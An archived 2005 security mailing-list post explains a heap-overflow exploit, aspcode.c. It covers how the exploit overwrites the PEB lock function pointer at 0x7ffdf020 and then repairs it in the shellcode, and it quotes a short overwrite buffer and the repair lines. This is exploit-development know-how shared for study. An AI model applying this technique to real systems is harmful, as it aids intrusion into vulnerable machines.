[prev in list] [next in list] [prev in thread] [next in thread]
List: dailydave
Subject: [Dailydave] about 0x7ffdf020 of aspcode.c (now utf-8)
From: "yuange" <yuange () nsfocus ! com>
Date: 2005-01-24 17:16:19
Message-ID: 003901c50238$6e7da7c0$0407a8c0 () windows
[Download RAW message or body]
About aspcode.c http://packetstormsecurity.nl/0209-exploits/aspcode.c
1.the book <<The Shellcoder's Handbook>> page 143:
A better strategy is to set the PEB lock to RtlEnterCriticalSection,as
follows:
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
2.http://cert.uni-stuttgart.de/archive/vuln-dev/2003/06/msg00095.html:
Well, Halvar uses the PEB technique to find kernel32.dll and related
infoz. Check out http://packetstormsecurity.nl/0209-exploits/aspcode.c for
an exploit in typical Chinese style using the SEH technique. Note how the
exploit's shellcode is about three pages of C code, which gets compiled by
Visual Studio into shellcode.
I'm still trying to figure out what these two lines really do...
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
Something to do with thread locking, obviously, but what?
Dave Aitel
Immunity, Inc.
Hack like a pro, without all the Mountain Dew:
http://www.immunitysec.com/CANVAS/
The aspcode.c is a heap buffer over exploit.
Heap buffer over can write anything to anywhere:
*p1=p2;
*(p2+4)=p1;
My code is p2+4=0x7ffdf020.You can see the code of aspcode.c:
char
buff7[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
0x7ffdf01c
The shellcode must repair The Function Pointer,so you can see
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic